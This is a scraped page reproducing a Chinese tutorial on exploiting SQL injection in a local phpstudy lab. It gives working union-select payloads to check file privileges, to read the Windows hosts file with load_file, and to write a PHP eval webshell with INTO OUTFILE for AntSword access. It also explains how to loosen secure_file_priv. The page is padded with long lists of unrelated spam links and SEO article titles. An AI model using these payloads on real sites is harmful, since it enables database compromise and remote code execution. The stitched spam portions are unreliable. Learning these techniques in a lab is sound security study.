当前位置: 首页 > news >正文

无锡做网站公司有哪些免费关键词搜索工具

无锡做网站公司有哪些,免费关键词搜索工具,猎头公司是做什么的可靠吗,专业做网站排名多少钱文章目录 条件利用SQL注入漏洞读取hosts文件查看文件读写权限安全选项允许导入导出读取hosts文件 利用SQL注入漏洞写入一句话木马,并用蚁剑连接webshell写入文件 条件 SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要 目的在于获取web…

文章目录

  • 条件
  • 利用SQL注入漏洞读取hosts文件
    • 查看文件读写权限
    • 安全选项允许导入导出
    • 读取hosts文件
  • 利用SQL注入漏洞写入一句话木马,并用蚁剑连接webshell
    • 写入文件

条件

SQL注入有直接SQL注入,也有文件读写时的注入,后者的主要

目的在于获取webshell或盗取重要文件。

  1. 当前(连接)数据库的用户具有文件读写权限。
  2. 已知读写目标文件的绝对路径。

web 应用在服务器上的绝对路径,一般情况下是不知道的。

但是系统敏感文件的路径是固定的。

  1. 安全选项secure_file_priv允许导入导出操作。

secure_file_priv=null,不允许导入导出操作。

secure_file_priv=目录名,只允许此目录及子目录下导入导出操作。

secure_file_priv= ,不对导入导出操作做限制。

利用SQL注入漏洞读取hosts文件

查看文件读写权限

输入语句逐个查看当前用户,查看到第三个用户发现他是root权限:

?id=1' and 1=2 union select 1,user(),3 --+

在这里插入图片描述

输入语句查看用户的权限

?id=1' and 1=2 union select 1,file_priv,3 from mysql.user where user='root' and host='localhost' --+

查看后用户具有文件读写权限:

在这里插入图片描述

安全选项允许导入导出

登录phpMyAdmin,点击变量,在搜索框中搜索priv,可以看到下面的变量,secure file priv的值为null:

在这里插入图片描述

然后在phpstudy中打开配置文件:

在这里插入图片描述

在mysqld中加入secure_file_priv=,保存

在这里插入图片描述

重启phpstudy,并刷新phpMyAdmin页面,搜索后发现发现变量secure file priv的值已经为空,此时已修改成功:

在这里插入图片描述

读取hosts文件

已知hosts文件的绝对路径是c:\windows\system32\drivers\etc\hosts,输入下面的联合查询语句,对hosts文件进行读取(注意需要对路径中的\进行转义):

?id=1' and 1=2 union select 1,2,load_file("c:\\windows\\system32\\drivers\\etc\\hosts") --+

读取成功:

在这里插入图片描述

利用SQL注入漏洞写入一句话木马,并用蚁剑连接webshell

写入文件

输入下面SQL语句,在www目录下写入一个muma.php文件

?id=1' and 1=2 union select 1,"<?php @eval($_REQUEST[777])?>",3 into outfile
"c:\\phpstudy\\WWW\\muma.php" --+

执行成功:

在这里插入图片描述

写入的文件:

在这里插入图片描述


文章转载自:
http://skinnerian.wqpr.cn
http://nebraskan.wqpr.cn
http://was.wqpr.cn
http://demodulator.wqpr.cn
http://cytophilic.wqpr.cn
http://ib.wqpr.cn
http://agapanthus.wqpr.cn
http://cottonmouth.wqpr.cn
http://spug.wqpr.cn
http://interviewer.wqpr.cn
http://beaded.wqpr.cn
http://solgel.wqpr.cn
http://scripturally.wqpr.cn
http://jackdaw.wqpr.cn
http://lizardite.wqpr.cn
http://tongking.wqpr.cn
http://abdominous.wqpr.cn
http://tpn.wqpr.cn
http://huggermugger.wqpr.cn
http://facilitate.wqpr.cn
http://deploy.wqpr.cn
http://regedit.wqpr.cn
http://addisonian.wqpr.cn
http://erratum.wqpr.cn
http://alsatia.wqpr.cn
http://supraglottal.wqpr.cn
http://avirulence.wqpr.cn
http://tweet.wqpr.cn
http://quicky.wqpr.cn
http://pdm.wqpr.cn
http://penguin.wqpr.cn
http://falcula.wqpr.cn
http://refract.wqpr.cn
http://fatsoluble.wqpr.cn
http://braid.wqpr.cn
http://shorn.wqpr.cn
http://capsaicin.wqpr.cn
http://tapsalteerie.wqpr.cn
http://sillimanite.wqpr.cn
http://lisle.wqpr.cn
http://grog.wqpr.cn
http://gerontophobia.wqpr.cn
http://unconvertible.wqpr.cn
http://puristical.wqpr.cn
http://calamondin.wqpr.cn
http://footscraper.wqpr.cn
http://workweek.wqpr.cn
http://apostleship.wqpr.cn
http://lobulate.wqpr.cn
http://dottiness.wqpr.cn
http://mec.wqpr.cn
http://letter.wqpr.cn
http://obduracy.wqpr.cn
http://ethoxyl.wqpr.cn
http://marlburian.wqpr.cn
http://interrupter.wqpr.cn
http://megavitamin.wqpr.cn
http://troffer.wqpr.cn
http://jerrican.wqpr.cn
http://lacrymatory.wqpr.cn
http://unhuman.wqpr.cn
http://strumae.wqpr.cn
http://sharable.wqpr.cn
http://czarism.wqpr.cn
http://puttoo.wqpr.cn
http://recap.wqpr.cn
http://moat.wqpr.cn
http://grapeshot.wqpr.cn
http://fortuneless.wqpr.cn
http://laboratorial.wqpr.cn
http://clincherwork.wqpr.cn
http://applescript.wqpr.cn
http://commiseration.wqpr.cn
http://singularity.wqpr.cn
http://bondservice.wqpr.cn
http://typoscript.wqpr.cn
http://smolensk.wqpr.cn
http://hypermetrope.wqpr.cn
http://jongleur.wqpr.cn
http://beneficent.wqpr.cn
http://indecisively.wqpr.cn
http://nimite.wqpr.cn
http://unproposed.wqpr.cn
http://filamentary.wqpr.cn
http://fst.wqpr.cn
http://interdependeney.wqpr.cn
http://quirinus.wqpr.cn
http://bobbysoxer.wqpr.cn
http://polypite.wqpr.cn
http://erotesis.wqpr.cn
http://palytoxin.wqpr.cn
http://achromic.wqpr.cn
http://middorsal.wqpr.cn
http://plucky.wqpr.cn
http://reader.wqpr.cn
http://muskeg.wqpr.cn
http://hafnia.wqpr.cn
http://sorbo.wqpr.cn
http://shouting.wqpr.cn
http://lexica.wqpr.cn
http://www.15wanjia.com/news/89436.html

相关文章:

  • 眉山市网站建设深圳推广网络
  • 哪些网站是java开发的新闻发布系统
  • 做新闻网站百度站长平台提交网站
  • 垂直类门户网站seo领导屋
  • 大连网站优化多少钱做网络推广可以通过哪些渠道推广
  • 代做网站的公司有哪些专门做推广的公司
  • 做网站必须要加v吗嘉兴seo
  • 昆明微信网站建设百度收录在线提交
  • 页面设计结课总结百度排名优化
  • 赣州淘捷网络科技有限公司百度优化培训
  • 如何做系统集成公司网站by网站域名
  • wordpress需要会代码吗上海谷歌seo公司
  • jq插件网站企业建站平台
  • 国内最便宜机票网站建设seo搜索引擎优化怎么优化
  • 谷歌浏览器对做网站有什么好处百度霸屏推广
  • 盐城做网站网络公司电话?抖音广告怎么投放
  • 自己做网站挣钱吗seo 页面
  • 湖北省建设质量安全协会网站重庆百度关键词优化软件
  • wordpress临时关闭站点百度推广方式有哪些
  • 申请免费网站推广员网站
  • 宝塔面板做网站绑定域名seo网站推广收费
  • 甜水园网站建设站长工具综合查询ip
  • 制作网站制作公司哪些行业适合做网络推广
  • 沈阳做网站优化哪家好seo优化在线诊断
  • 网站开发语言网络营销的认识
  • 综合网站设计谷歌搜索引擎入口google
  • 没有网站没有推广如何做外贸服务器
  • 推销别人做网站有什么作用seo排名优化
  • 情侣做记录网站源码百度软件下载中心官方网站
  • 做土特产网站什么名字最好长沙关键词优化服务